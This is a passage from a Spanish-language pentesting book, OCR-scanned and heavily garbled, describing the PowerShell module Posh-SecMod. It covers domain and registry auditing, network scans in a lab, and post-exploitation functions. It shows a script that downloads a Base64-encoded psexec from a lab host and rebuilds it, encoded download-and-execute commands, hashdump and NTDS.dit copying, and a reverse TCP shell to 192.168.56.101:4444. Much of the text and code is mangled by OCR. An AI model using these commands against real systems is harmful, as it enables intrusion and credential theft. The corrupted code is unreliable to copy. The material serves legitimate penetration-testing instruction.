funciones  para  au.oma.iaar  ei  uso  de  tmo  los  ^  ^  §  ^  ^  „  A„ 

proporciona  funciones  para  automatizar  ,-ealizar  descubrimiento  de  maquinas 

XMLRPC.  Posh-Shodait  proporciona  nnc  c  p  h_nrusTo,a\  proporciona  funcioacs 
utilizando  el  servicio  Stator  utdizando  un  APU^e Ap|  Se mis  a(k,a„te 

Modulos  para  comenzar  relacionados  con  las  utilidades  basicas. 

En  este  apanado  se  muestran  los  mddulos dc ‘.Pas  -Seek ^  ^  ^  datQS  y  runcion*  de  auditor*, 
tratamiento  de  registro.  parseos  sobre  fichf0*’  J  .  de  concepto  de  las  funcionalidades quest 

E. , primer  modulo  de,  <|ue  se  enumerardn  las  H— 

disponibles  es  Audit. 


Funcion 


Get-AuditLogedOnSessions 


Get-AuditDSComputer Account 


Description 


Esta  funcion  enumera  las  sesiones  logadas  en ' 
dada.  Internamente  esta  funcion 
Por  ejemplo,  si  se  quiere  ^Loged0nSessW  I 

ejecutando  se  puede  ejecutar  Get-AudULoge 

where-object  (S  .piwesses  -gtO, - - 

. _ —  1  /Inmtn 


xvhene-ooieci  i*  ^ - j 

Enumera  los  equipos  pcrtenecientes  al 1  dom' que 
informacion  sobre  las  versiones  c  si  ^jjentro*1 

ejecutan  las  maquinas,  el  service  pack,  la  ruta  ^ 

j  • IP  de  la  maquina* - _ - 
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Funcion 

Descripcidn 

Get- A  uditDSUserAcoimt 

Enumera  los  usuarios  pertenecientes  al  dominio  mostrando 
informacion  como  el  nombre  de  cuenta  o  SAMAccount ,  ruta 
Di\  en  el  dominio.  datos  sobre  la  contrasena  como  la  techa  de 
modificacion.  expiration  de  esta,  etcetera.  Ademas.  informa¬ 
cion  sobre  los  grupos  a  los  que  pertenece  el  usuario,  el  ultimo 
logon  o  el  identificador  de  seguridad  SID 

Get -Audi  tDSLockedUserAcount 

Enumera  las  cuentas  de  usuario  que  se  encuentran  bloqueadas 

en  el  dominio 

Get- A  uditDSDisabledUserA  - 
count 

Enumera  las  cuentas  de  usuario  que  se  encuentran  desliabilita- 
das  en  el  dominio 

Get-AuditDSDeletedAccount 

Enumera  las  cuentas  de  usuario  que  se  han  eiiminado  en  el 
dominio 

Get- A  uditlnstallSoftware 

Devuelve  el  listado  de  softw  are  instalado 

Get- A  uditFile  TtmeStamp 

Esta  funcidn  recupera  las  marcas  de  tiempo  de  un  archivo.  el 

cual  es  pasado  a  traves  del  parametro  —file.  La  informacion 
que  se  recupera  es  el  ultimo  acceso,  la  ultima  escritura,  la 
lecha  de  creacion,  la  lecha  y  hora  de  modificacion.  la  cual  no 
se  muestra  en  las  propiedades  de  un  fichero 

Tahla  5.14:  Funciones  de  Audit  en  Posh  Sec  Mod. 


I-.I  segundo  modulo  a  tratar  es  Database.  Estas  funciones  permiten  al  pentester  interactuar  con  una 
base  de  datos  SQLite • 


Funcion 

Description 

Connec/-DBSQLite3 

Permite  crear  una  conexion  a  base  de  datos  SQLite  3.  La  conexion 

es  aiinacenada  en  SGlohal.sqliteconn 

Remove-DBSQLite3Con- 

nection 

Elimina  una  conexion  SQLite.  Para  eliminar  la  conexion  se  le  tie- 
ne  que  indicar  el  index  adecuado.  En  easo  de  no  pasarle  un  index 
se  ileva  a  cabo  la  eliminacion  de  todas  las  conexiones,  por  ejem¬ 
plo  Gei-DBSQLite3Connection  \  Remove-S0Lite3Connection 

C'l-DBSQLncl  (  on  nection 

Enumera  las  diferentes  conexiones  abiertas  con  la  base  de  datos 

In  voke-S  Ql .  i  te3  Query 

Ejecuta  consultas  SQL  contra  una  conexion  existente.  Para  indicar 
la  conexion  que  se  quiere  utilizar  se  dispone  del  parametro  index. 

Un  ejemplo  valido  es  Invoke-SQLite3Quety  -SQL  •SELECT 
nombre  FROM  labial ;  -Index  1.  Esta  instruccion  devolvera  los 
valores  del  campo  nombre  que  se  encuentra  en  la  labial  a  traves 
_ del  uso  de  la  conexion  con  identificador  1 

Tabh  3.15:  Funciones  de  Database  en  Posh-Sec  Mod. 
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Funcion 

Description 

Import-NmapXML 

"  lm porta  un  fichero  XML  de  Nmap  y  devuelve  una  coleccton  de 
objetos.  los  cuales  representan  la  informacion del  escaneo  que  se 

encucntra  en  el  fichero  XML _ 

Importa  un  fichero  XML  de  la  herramienta  DNSRecon  creando 
objetos  con  la  informacion  que  proporctona  la  hen—U 

For  ejemplo,  Import-DNSReconXML  .\output.xml  -Hite,  SRV 
devuel  ve  objetos  con  informacion  de  los  Service  Record  reporta- 
dos  por  DNSRecon _ 

...  /  n .  .  n.sch-Sflt'Motl. 

Jmport-DNSReconXML 

El  cuarto  modulo  a  tratar  es  Registry.  Con  estas  funciones 
acciones  de  forma  comoda  en  cl  regislro  de  la  maquina. 


el  pentester  puede  manejarse  y  reali/ar 


Get-RegKeys 


New-RegKey 


Remove- RegKey 


Get-RegValues 


Test- RegKey  A  ccess 


i„„me,a  las  claves  que  se  encuern,™  denim  *  un.  dc 


regislro 


Crea  una  clave  de  regislro  dentro  de  la  clave  indicada_ 

Fiimina  nna  clave  de  registro  indicada_ 


Set-RegVcth ic 


Get-RegVahte 


Remove-Reg  Value 


Get-RegKeySecurityDe&criptor 


Enumera  los  .alores  y  los  lipos  dc  dales  do  ana  da«c  da 

re gi stro  indicada _ . 

“Chequea  si  sc  tiene  acceso  a  la  ubicacdn  del  regisuo  indi¬ 
cada.  Adema,  cheque,  el  tipo  de  permiso  que  *  ««£ 
la  ubicacion.  A  traves  del  uso  del  parametro 
preuunta  a  la  funcion  si  se  tiene  perm.so  para  rea h/ar  consul 
tPi  diminar  claves,  modificar  valores,  camb.ar  el  proptetano. 


etcetera 


Mnrtifi . rn<,r  1111  valor  3  una  ClaVC  indl— 


Recupcra  cl  valor  de  la  elave_ 
ciimind  ,.n  valor  espccitico  de  unaclavc^ 


clave  de  registro  y  la  >'sta  de 


Enumera  el  propietario  de  una 

control  de  acceso  de  dicha  clave 


Tahla  3. 1 7:  Funciones  de  Registry  en  Posh-Sec  Mod 
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El  quinto  modulo  a  tratar  es  Utility.  Estas  funciones  proporcionan  al  pentester  pequenas  utilidades 

que  pueden  S?r,‘neCeSUadaS  Cn  algim  instante  en  e1  pettiest.  Esta  pequefia  coleccidn  de  herramientas 
proper ciona  diferentes  acciones  y.  en  algunos  casos,  muy  diferentes. 


Funcion 

Description 

Get-  WebFile 

Esla  funcion  permite  descargar  un  archivo  desde  una  direction 

URL  y  almacenarlo  en  una  ruta  local 

New-Zip 

C  rea  un  nuevo  fichero  Zip  con  contenido 

Acid-Zip 

Anade  contenido  a  un  fichero  Zip 

G  et-ZipChildl terns  Recurse 

Lisla  el  contenido  del  fichero  Zip  de  forma  recursiva 

Get-Zip 

Lista  el  contenido  del  fichero  Zip 

Expand-Zip 

Descompnme  el  contenido  del  fichero  Zip  y  lo  almacena  en  una 
ruta  la  cual  se  indica  como  parametro 

Get-FileHash 

Esta  funcion  recibe  un  fichero  y  devuelve  el  hash  de  dicho 
archivo  en  formato  MD5.  SHA 1 .  SHA256.  SH A  384  o  SHA5 1 2. 
Como  ejemplo  se  indica  Is  *.exe  \  Get-FileHash 

Update-SysintemalsTools 

Permite  la  dcscarga  de  la  ultima  version  de  las  herramientas  dT" 

Sysinternals.  La  ruta  donde  se  descargan  sc  indica  en  la  invoca- 
cion  de  la  funcion 

Get-ComObject 

Enumera  los  objetos  COM  disponibles  en  el  sistema  local 

Get-PosI ?Sec  Mod  Vers  ion 

Lista  la  version  que  se  esta  utilizando  de  Posh-Sec  Mod  e  indica 

cual  es  la  ultima  version  disponible 

Tab /a  3.18:  Funciones  dc  Utility  en  Posh-SecMuJ. 


Discovery 

bte  modulo  permite  al  pentester  disponer  de  funciones  que  ayudan  en  el  proceso  dc  footprinting  v 
fUfnC'0neS  qUe  SC  pUCden  encontrar  e"  «  son  utilizables  tanto  cn  auditorfas 

sssr  e  as<  ya  que  permiten  de  una  u  °tra  ma,,era  taciiitar  d  ****«>  ^ 

QiWnermU  CaraCt|[:nstlcas  de  las  funciones  de  escaneo  que  se  encuentran  en  el  modulo  Discovery  es 

Las  fundus  cue  se"  7™°  ^  de  diferenteS  formaS’  e  incluso  a  d'^entes  niveles  de  red. 
 ninciones  que  se  pueden  encontrar  en  este  modulo  son  mas  de  1 0  y  se  describe,!  a  continuacion- 


Enumera  los  registros  inDNS  que  se  encuentran  en  la  red  local 
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Funcion 

Description 

New-lPRange 

Genera  una  eoleccion  de  objecos  IPv4  o  IPv6  segun  el  'Pf** 

,l„  Pnr eiemblo.  New-tPRange  Range  192.I6S.U-19-.16S.U0 

Nen>-IPv4  Range 

Genera  un  listado  de  direcciones  IP  indicadas  en  el  range  propo.c.o- 
nado  a  la  funcion 

New-IPv4FrowCIDR 

"Genera  un  listado  de  direcciones  IP  a  traves  de  una  red  que  se  pro- 
po“  1  a  la  funcion.  Po,  ejemplo.  Sen-^Fw.nCDR  -N*m* 

J  92. 168.1.0/32 

lnvoke-ReverseDNSLoo- 

kup 

"  Realiza  resolucion  inversa.  La  funcion  adm.te  d.ferentes  opetones 

para  generar  el  listado  de  direcciones  IP.  por  ejemplo  Invoke-Rever- 
seDNSLookup  -CIDR  <red>  o  Invoke-ReverseDNSLookup  Range 
<direccion  IP  inicial>-<direccidn  lPfinal> 

[m  'oke-  PingScan 

Realiza  un  escaneo  a  traves  de  ICMP  contra  un  range  ded.recc.ones 

IP  proporcionadas  a  traves  del  parametro  Range.  Tambien  sc  puc  c 
utilizar  el  parametro  -CIDR 

Invoke- Port  Scan 

Realiza  un  escaneo  complete  a  traves  del  protocol0  TCP  y 

UDP.  Por  ejemplo,  Jnvoke-PortScan  -Target  192. 166.1.3  -Ports 

22  135.139.445  -Tvpe  TCP 

/ nvoke-A  R  PScan 

’  Realiza  un  escaneo  ARP  sobre  la  red  local.  Este  l.po  de  escaneo 
permite  descubrir  maquinas  conectadas  a  la  red  local 

Cipt-  Svsl£i)iDNSSci*vc?i 

Enumera  los  servidores  DNS  del  sistema  local 

Invoke-EmtmSR  VRecords 

Enumera  los  registros  SRV  del  DNS  dado  un  dominio 

Resolve-Host  Record 

'  Resuelve  un  nombre  de  dominio  o  FQDN  a  su  regtstro  CNAME.  A~ 

o  AAA  A 

Resotve-DNSRecord 

Realiza  consultas  especificas  contra  un  servidoi  DNS.  Por  ejemplo. 
Pesolve-DNSRecord-Targel^  microsojt.com  -Type  A/A - 

Con  verl  To-lnA  cldrA  R  PA 

‘ '  Convienc  una  String  que  represent  una  direccion  IP  a  tormato  m- 

Addr-ARPA  - - 

r>  C  -.1/..// 

Tab /a  3.19:  Fund  ones  de  Discovery  en  Posh-Sec  Mod. 


. -  - 

funciones  relacionadas  con  el  protocolo  DNS. 

Las  tones  Ineote-ARPScan.  ^ake-PmgScan  o  Ineoke-PortScan  syndaran  al 
reconocer  maquinas  en  la  red. 
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permite  conoccr  el  numero  de  maquinas  que  existe  en  la  red  y  la  relacion  direccion  IP 
MAC  de  estas. 


L/JiCttlUIl 


El  escaneo  es  a  mvel  de  enlace,  por  lo  que  los  firewall  que  trabajan  a  nivel  de  red  no  bloquearan 
estas  peticiones.  M  ‘ 


P192.*168bS6.'0?23teStln9  P°WOMheil^Po»i»-Secriod-«astef‘\Discowery>  Invoke-ARPScan  -MaxThreads  10  -CIDR 


8:00:27:75:68:36 
8:00:27:00:58:E5 
8:00:27:10:80:55 
8:00:27:Eft:54:F2 
8:00:27:00:58 :E5 


Address 

192.168.56.100 

192.168.56.101 

192.160.56.102 

192.168.56.103 
192.160.56.255 


P:Nli*»*°s\pen  testing  powers  hell\Posh-Sechod-r>astci>\Di.:nnu»»..,s 


Fig.  3.21:  Descubrimiento  de  maquinas  a  nivel  de  enlace  con  ARP  Scan. 

El  escaneo  por  protocolo  ARP  se  reduce  a  la  realizacion  de  una  peticion  ARP  Request  a  la  direccion 
broadcast  que  es  la  ti&M'-ffl  preguntando  por  una  direccion  IP  en  concreto.  Se  puede  traducir  en 
un  mensaje  que  es  enviado  a  todas  las  maquinas  de  la  red  a  nivel  de  direccion  MAC  y  que  nreeuntt 
(;0u,en  tune  la  direccion  IP  X?  Como  la  funcion  Invoke-ARPScan  permite  al  usuario  configurer  un 
range  c c  direcciones  IP.  a  traves  del  parametro  Range,  o  una  mascara  de  red.  a  traves  del  parametro 

C/D/?  se  puede  preguntar  a  todas  las  maquinas  que  se  quiera  para  ver  si  estan  encendidas  y  con 
conectividad.  J 

El  escaneo  por  ICMP  es  el  que  se  implementa  en  la  funcion  Invoke-PingScan.  Es  realmente  sencillo 
(L  cortarya  que  sepodria  bloquear.  es  dear,  hacerque  la  maquina  desiino  rechazase  la  contestacion 
Es  un  escaneo  rapido  y  que  de  un  primer  vistazo  puede  aportar  conocimiento  sobre  la  conectividad 
con  las  maquinas  de  una  red,  ya  sea  local  o  remota. 


s  D:\libros\pentesting  potters  he  ll\Posh-SecMod 


ci*y>  Inuoke-PingScan  -CIDR  192 .168 .56  .0/j 


Tine  Address 


0  192.168.56.101 
1  192.168.56.102 
0  192.168.56.103 


P^slibi*os\pen testing  Do.>e,.s),ell\Posh-SecHod-wastei»\Disenu....s 


Pig.  3.22:  Ejecucion  Re  un  escaneo  a  D  aves  de  ICMP  en  una  red. 

^rr1  o/'c~fJ°rlScan  proporciona  un  escaneo  de  puertos  a  traves  del  protocolo  TCP  y  UDP 

*  0,"  rnen  HPa™mi:tr0  T}’Pe  "  PUedC  de8ir  emre  Un°  de  l0S  d0S  P^ocolos.  Se  puede 
Cm  _  Hi  ,  de  pucrtos  contra  un  SruP°  de  maquinas.  por  ejemplo  utilizando  el  parametro 
Permit  .  .  reclamente  contra  una  en  concreto  utilizando  cl  parametro  Target.  El  parametro  Parts 

v  25  s::iT,nKrar;,,;a  Senc  de  puertos  a  escanear,  por  ejemplo  si  se  quiere  escanear  el  puerto  22  r\ 
/  J  st  indicaria  de  la  sigmente  forma  -Ports  22,23,25 . 

PueitosTblen  >eHUCdC  V1Suallzar  la  eJecuci6n  de  esta  funcion  donde  se  obtiene  como  resultado  los 
dDiertos  de  una  maquina. 
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PS  0  =  .lih,?,rrf  ig  m-168-56- 

103  -Type  TCP  -Ports  21,22, 80, 44b, buu  - 


192-108.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 


S  n:\lihfos\pcntestin 


Port  State 

21  Open 

22  Open 
80  Open 

445  Open 

i^n^Pnr.l.-SecHoA-nasterNDiscover^ 


nilTTBTl  I  - 

Fig.  3.23:  Ejecucion  de  i m  eseaneo  de  puertos  ter. 


En  algunos  casos  puede  ser  interesante  mezclar  estas  funciones  con  scripting  basico  o  con 
canalizacion  de  objetos  para  potenciar  el  uso  de  las  tunciones. 

Por  ejemplo,  para  poder  realizar  un  eseaneo  sobre  una 

suficientemente  grande  como  para ino po  er  < enu  me  colecci6n  de  numeros  entre  un 

se  puede  hacer  uso  del  operador  de  rango  .  Para  .jmo>  <valor  maximo>,  por 

valor  minirao  y  un  valor  maximo  se  ejecuta  >a  jnstruc  empezando 

ejemplo  20..500.  Esta  instruccion  devolve*  480 ^  c  da  ^rero  a  foreach  para  que 

?i  hi«a  el  500  Util  zando  canalizacion  sepodnapasarcaaanuuiMu 

por  el  20,  zl,  nasia  ei  juu.  enn,  ,  .  „i.  >  r„..nLv-PortScan -Target  <chreccion  IP> 

^CP  /'.^L^vm'iTble^especial  5_  ira  cogiendo  los  dilerentes  valores  entre  el  20  y  el 
500  por  cada  iteracion.  tal  y  como  puede  visualizarse  en  la  imagen. 


foreach  Onuoke-PortScan 


92.168.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 

92.168.56.103 


Port  State 

21  Open 

22  Open 

23  Open 
25  Open 
53  Open 
80  Open 

111  Open 
139  Open 
445  Open 


Fig.  3. 24:  Selecciommcio  un  rango  de  ptterios  Tt  P  con  Im  oke  Pot  l.w  an. 


La  funcion  ,nVoke-ReVerseDNSLookup  penni.e  al  pertesjer  tpo^  £££££ 

maquma  a  , raves  tie  la  resolqcion  inverse  tie  un.  direction  IP.  U .  hmm  W  P 

Jge  y  cm  P.™  confeurnr  ranges  tie  ."££££.  ,as  t»*s 

ejercicio  sencillo  de  canalizacion. 

En  primer  lugar  cl  pemester  crea  un  archive  de  texto  do"*  por  ““al,ara  ana 

.1  „  ,1  miximo  del  rango.  en  este  caso  cs  el  raismo  valor. 


Fig.  3.25:  Resotucian  invents  de  dineccianes  IP  obtenidas  a  troves  defichero personal izado. 


Post-Explotacion  con  Posh-SecMod 

El  modulo  de  Post  Exploitation  de  Posh-SecMod  presents  un  gran  ruimero  de  funciones  rclacionadas 
con  la  fase  de  post-explotacion  de  un  test  de  intrusion.  Como  se  puede  leer  en  la  descripcion  de 
las  funciones  el  pentester  puede  disfrutar  de  diversas  opciones  para  obtener  informacion,  como  un 
listado  de  hashes,  de  las  niaquinas  a  las  que  se  accede,  la  posibilidad  de  descarsar  codigo  cjecutablc 
en  diversos  formatos,  la  posibilidad  de  ejecutar  procesos  de  forma  remota.  una  shell  inversa  a  traves 
del  protocolo  TCP.  etcetera. 

Este  modulo  es  uno  de  los  mas  funcionales  del  conjunto  Posh-SecMod.  aunque  como  se  ha  ido 
v iendo  en  el  resto  de  modulus  hay  luncionalidadcs  muy  interesantes  para  la  realizacion  del  pentest. 

A  continuacion  se  muestran  las  funciones  disponibles  en  el  modulo: 


Funcion 

Descripcion 

ConverlTo-PostBase64Com- 

mand 

Esta  funcion  eonvierte  un  comando  cn  formato  String  en  un 
comando  encodeado  en  Base64.  Como  ejemplo  se  presents  la 
siguiente  instruccion  Convert To-BaseMConnnand  -command 
"write- host  'hello  world  ",  dando  como  salida  dwBvAGkAdA- 
BIA  COAaA  B  vA  HMAdAAgA  CcAaABlA  G  wAbABvA  CAAdwBvA- 
H/AbABkACcA. 

C  Dm  press- PostScript 

Transforma  el  contenido  de  un  script  en  un  EncodedCommand. 

o  bien  Iransforma  un  comando  direclamente  en  un  Enco¬ 
dedCommand.  La  funcion  admite  un  paramelro  file  que  recibe 
una  ruta  de  un  script  para  transformer,  o  un  parametro  com¬ 
mand  que  representa  el  comando  que  se  quicrc  transformar 

New- 

IDs  tDm  vnloadExecuteSct  ipt 

Esta  funcion  genera  un  EncodedCommand  que  descarga  un 
script  de  PowerSheU  y  lo  ejecuta  en  el  sistema  de  la  siguiente 
f  orma  PowerShell.exe  -EncodedCommand  <command> 

Ne\  i  •-  p ost  Do  h  ’nloadExecu  tePE 

Esta  funcion  genera  un  EncodedCommand  que  descarga  un 
array  de  bytes  y  lo  ejecuta  sobre  el  sistema  de  la  siguiente 
forma  PowerShell.exe  EncodedCommand  <command> 
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Funcion 

Descripcion _ _ _ 

Start-PostRemoteProcess 

Esta  funcion  ejecuta  un  proceso  en  una  maquina  remota  a 
traves  del  lenguaje  WM1 

Esta  funcion  genera  un  comando  que  permite  realizar  un 
volcado  de  hashes  de  la  maquina,  comunmente  conocido  como 
hashdump.  Como  ejemplo  se  presenta  la  siguiente  mstruc- 

Get-PoslHashdumpScript 

cion  Scorn  =  Gel-PostHashdumpScript,  la  cual  almacena  en 
la  variable  Scorn  el  comando  que  se  ejecutara  a  posteriori  con 
PowerShell.exe  -command  Scorn 

Get  PostReverTCPShei l 

Esta  funcion  proporciona  un  EncodedCommand ,  el  cual  crca 
una  conexion  inversa  que  proporciona  una  shell.  Generalmen- 
te  esta  funcion  es  utilizada  junto  a  Start-PostRemoteProcess. 
Como  ejemplo  se  presenta  la  instruccion  Scorn  =  Get-PostRe- 
verSliell  -LHOST192.16h.LI04  -LPORT 4444.  Despues  la 
variable  Scorn  puede  ser  utilizada  por  funciones  que  ejecuten 
procesos 

Get-PostCopvNTDS 

Copia  el  fichero  NTDS.dit,  el  cual  es  el  fichero  que  almacena 
informacion  sobre  los  usuarios  y  maquinas  de  un  dominio  en 
un  controlador  de  dominio.  utilizando  Volume  Shadow  Copy. 

Por  defccto.  el  fichero  se  copiara  cn  la  ruta  SenvtTEMP 

ConvertTo-PostFiletoHex 

Convierte  un  fichero  en  un  array  de  bytes  en  hexadecimal 
Convierte  un  array  de  bytes  en  hexadecimal  al  ficheio  origi¬ 
nal.  Con  estas  2  funciones  se  puede  transformar  un  binatio  en 

Convert  To-Pos  (Hex  to  h  il  e 

contenido  hexadecimal  y  meterlo  en  un  fichero  de  texto  para 

introducirlo  en  un  sistema _ 

i  .  Ilt  i  icfri/iix  c\f»  mnexiones  en  forrn&to  Stt  mg 

Get-  Webconfig 

Devuelve  un  nsuiuo  tie  u)iic.\iv>in.n  vn  ^ - 

_  Devuelve  un  listado  de  los  Application  Pool  y  comraseftas  de 

Get- A  pnl  icationHos  1 

los  directories  virtuales 

Tablet  3.20:  Fimdones  de  Post  Explanation  en  Pash-Sec  Mod. 

PoC:  Base64,  compresion,  descargas  y  ejecucion 

Fn  esta  prueba  de  concepto  se  van  a  probar  diferentes  funciones  relacior 
codigo  en  Base64,  la  posibilidad  de  descargar  fieheros  extemos  y  pode.  ej< 
pueden  ayudar  a  un  pc, Hester  a  conseguir  descargar  el  hchero.  ya  sea  instr 
un  binario,  en  la  maquina  donde  se  encuenlre  o  en  una  maquina  remota.  Qui. 
utilizar  estas  funciones  sean  miquinas  Windows  sobre  las  que  el  penteste. 
si  que  puede  ejecutar  instrucciones  en  una  PowerSheU.  ya  sea  porque  tie 
Puede  que  el  pen, ester  se  encuentre  en  un  entomo  sobre  el  que  no  puede 
dispone  de  sus  herramientas. 
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La  primera  luncion  que  se  mueslra  en  esta  prueba  de  concepto  es  Compress- PostScript.  Con  esta 
luncion  el  pentester  puede  comprimir  el  contenido  de  un  script  y  almacenarlo  en  una  variable  con 
el  fin  de  ejecutarlo  despues  mediantc  la  instruccion  PowerShell.exe  -Command  Sfile,  donde  S/t/e 
es  la  variable  que  almacena  el  contenido  del  script  de  forma  comprimida.  En  la  imagen  se  puede 
visualizar  un  pequeno  ejemplo  de  un  script  que  ejecuta  3  palabras  por  pantalla. 


PSCTvUsersNpgonaalezSDesktop^ - - 

PS  C:\Users\pgonzalez\Desktop>  cat  .\p.psi 
»c)»o'  bo  la 
>cho  ho  la 
;cho  bo la 

PS  C:\Usei‘s\pgonzalcz\Desktop>  Conpi^ss-PostScript  -File  C:\Users\pgonzalez\De-kton\n  n.i 

^eonprecoioriMo.lcl^Decop.pi.ess^  [Text  .Encoding]:  :ftSCI  I  » .HcadToEnd<> ;  '  CIO. Compress 10 

*  pouershell?exeS-connandrSf  ileFile  ^^“-Sp^nzaleeVDe^opNp.ps! 

io  la 
rio  la 
io  la 

PS__Cl\Users\paonzalcz\Desktop> _ 


Pig.  3.26  Con  t pres  ion  de  un  fichero  de  PowerSheU  para  sit  posterior  ejecucion. 


La  segunda  funcion  que  sc  presenta  en  la  prueba  de  concepto  es  New-PostDownloadExecuteSeript. 
Esta  funcion  permite  descargarse  un  script  en  remoto  y  genera  un  EncodedCommavd.  es  dccir.  un 
comando  en  PowerSheU  que  se  encuentra  en  Bctse64.  pero  cs  totalmente  ejeculable. 

Una  de  las  cosas  interesantes  que  se  pueden  hacer  con  esta  funcion  es  la  descarga  de  un  script. 
El  script  que  se  descargar^  en  esta  prueba  dc  concepto  proporciona  al  pentester  la  posibilidad  de 
descargarse  un  binario  que  se  encuentra  cn  Base64  en  un  ficliero  de  texlo.  Es  decir.  supomja.se  que 
el  pentester  tiene  en  una  maquina  con  direction  IP  192.168.56.101  un  servidor  web  dontre  ofrece 
fieheros  txt,  los  cuales  contiencn  un  fichero  transformado  en  BaseM.  La  idea  es  que  con  la  funcion 
New-PostDownloadExecuteScript  se  descargue  un  fichero  txt  de  los  que  se  ofrece  en  el  servidor 
web.  Esta  funcion  transformara  el  contenido  del  fichero  txt  en  un  EncodedCommand,  el  cual  podra 
serejecutado  a  posteriori. 

A  continuacion  se  muestra  el  codigo  de  una  funcion  en  PowerSheU  que  transforma  un  fichero.  ya  sea 
un  binario.  un  script ,  un  documento  o  cualquicr  cosa  en  un  fichero  que  contiene  su  representacion 
en  Base64.  La  ejecucion  de  esia  funcion  es  sencilla  ConvertTo-Base64  -SourceFilePath  <Fichem 
a  transformar,  por  ejemplo  un  EXE>  -TargetFilePalh  <Fichem  donde  se  almacena  en  Base64>. 

function  Conv€*rtTc-Base64 

pa  ram 
( 

,  sLringJ  33ourcor  ilePcith, 

. string'  STaxget File Path 

) 

SbufferSize  =  9000  #  debe  ser  multiple  de  'I 

Sbuffsr  =  New-Objecc  byte  | ;  SbufferSize 

Sreader  =  [System. 10. File; : :0penRead ($So jrceFiiePatb) 

Swriter  =  [System. 10. File] : :CreateTextf$Targetri lePath) 

SbytesRead  =  0 

do 
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SbytesRead  -  5 reader. Head <$btf fer,  0.  sbvtt,sRead)  >  ; 

Swriter  .Write  ( [Convert)  :  :ToBase6«trmg  (Suffer.  0,  SbytesRead, 

(  while  (SbytesRead  -eq  SbufferSize) ; 
deader .  Dispose  ( ) 

$  writer. Dispose  () 

En  es„  prueba  Pa  concep.o  e,  ha  *d>  h — S' objSvo XX « 

herramienla  o  archivo  que  el  penteater  necesitc  duranie  la  auditona. 

Lasiguiente  funcion  conv,e„«  Base64  a.  Itch.™  original 

se'la  bajarh'con  la  funcidn  S^Do^opd^cubScnp, 

de  Posh-Sec  Mod. 

function  Convert .Fror-Base64 

\ 

param 

[string]  $  Sou  r  ceF i lePa t  h  , 

[string]  $TargetF tie Path 

SSourcerilePath  -  Resolve-PathSafe  ^ourceFUePath 

STaegetFi lePath  -  Reaclv*-*»tKSaf«  STarge- FilePath 

Sbuf ferSize  »  90C0  It  debe  ser  multip.o  de  <i 

'bulker  -  Sew-Object  charf]  Sbuf£erSize 

sredde-  -  r System.  tC.Fi-e!  :  sOpenText  (SSourceFi .eiath 

Swriter  =  [System. 10 . File] : :OpenWrite (STarqetFi .ePath, 

SbytesRead  -  0 
do 

Swrl -.er. Write  (Sbytes.  0,  Sbytes . '  t-r.gtn)  , 

)  while  (SbytesRead  -eq  Sbu££erSizcl  ; 

$ reader .Dispose ( > 

Swriier. Dispose () 

function  Resoive-PathSafe 


{ 

pararri 

i 

[string]  SPath 

»  ,  n  _.vr  qcssionState . Path . GetDtresoi vedProviderPathFromPSPath 

SExeeutionContext .  session^ta  ue .  -  a  — 

(SPath) 

) 

function  download! 
param( 

[Parameter (Mandatory) 1 
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[string]  $path, 

[Parameter ( Ma nda icr y )  ] 

' string]  SpaLhTaraer, 

[Parameter (Mandatory) J 
[string]  $io 
I 

$b«se64  ~  Invoke-WebRequesf  "http: //$ ip/Spa tb" 

echo  $base 64 . Content 

echo  $base64  .Content  >  iileEase.txt 

jTSSSfST4  -SOUrCeFiieP-h  GleBase.txc  -TargetFilePath  SpathTargec 

) 

download  pat-i  psexec.txt  -pathTarget  .\psexec.exe  -ip  192 .168.56.101 

D^VeJ^p°m  /Sj?/!wfi,?a  Hnea  'a  inStrUcd6n  downhad  -P°‘h  /»***■*  -pathTarget 
T  Lt  p  ,,6.S56JL  c  "do  “  cjecu,e  la  s'guiente  mslruccibn  Pom-rSheUm 
-EmndedCommand  (NeK.Pos,Dp^badExmeScnp,  -Ur,  ZmoZ 

P  ,n  /tr"8  "T  StS'0n  d°  Pm  erSI"!l1  y  “  ejeemara  el  resuhado  de  la  mstruccidn  ,Ve„ 
PodDovnloadCxecMScrlp,  - Ur I  hnp.mVMSMtOVchwIocdrn.  £s,a  uhima  mMn.ctn 

siner.i  un  EncodedComnmd ^que  lo  <jue  realmenle  realize  cs  la  ejecucidn  del  contenido  del  lichen) 
„  por  esra  razon  la  ulthna  linea  del  fichero  downlpad.u,  « ./„„„ W  " 

■pa,hT<,rge,.\psaec.ei'.v  ,P2 163.56. 10,  para,  am,  vez eargadas  las  fimeiones, ej ZZZ 

Puedc  parccer  algo  enrevesado.  pero  si  se  aplica  paso  a  paso  se  veia  sencillo.  Esle  proceso  permite 
X, “Sr  ,,P“  *  "rChi™  *  "  — . — *>  «*  algunos  StEt 


^S5S!SaH3g«^SSffl^iSiS8g!SSgg?K£!S£iS!g"!;iSrf£«ti5?g“»«g"xiWlr3E»<»HMJU2QxaVK«;«?«:HHCWtlCTi= 

WUPi 

PC  £‘NHsersVPS°nzalt2M)esktop> 

Q  J;:VHsc,‘sXP9or>2alec\Desktop> 
pc  r:\,sei'sNPSr°n2al«2\Decktop> 

^^ii^£S£9ongaleZ\D<.sktop>  .\psexec.exe _ 


F,g.  3.27.-  Descarga  en  hase64  depsexec  v  transformation  a  blnario. 


PoC:  Shell  inversa,  SAM  y  NTDS  con  Posh-SecMod 

c"bes,HPetanh  *  COnM?to  .*  Utjlizan  funciones  ^  post-explotacion  interesantes  para  llevar  a 
'»o^nizaci6n  eJunrS'lar^"  °'raS  mdqU,nas  haciendo  ™vimiento  lateral  en 

acciol“eenSba  D  ,a  i demS  P°  S  ^  “  °,ro  ^  de  Wormadon.  Este  tipo  de 

naccn  bajo  la  idem, dad  y  permisos  conseguidos  hasta  el  momento  por  el  pen, ester. 

!"cPenmernlUnSar  f  Ut,’liZara  13  funci6n  Get-PostReverTCPShell  para  generar  un  codigo  en  base64 

s hell  que  se  00^^^ fo'60^0  3  dC  *1™  PowerShe/l  proporcionara  la  invocacion  de  una 
nna  inversa  a  un  handler  que  el  pentester  tendra  configurado.  En  la 
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imagen  se  puede  visualizar  como  la  8eneraci6n  dd  codigo  en  dc 

£—  — — - 

nombre  de  la  variable  utilizado  para  almacenar  el  eodigo.  _ 


D:\libros\pentesting  powemhcUxrosh-Sectlod- 


i*\Post  Exploit  at  ion>  $shell 


Get-PostReverTCPShcll 


LHOST :  192.160.56.101 
LPORI:  4444 


AdQDuAGHftdn 


CAftewAkncnAbAB 


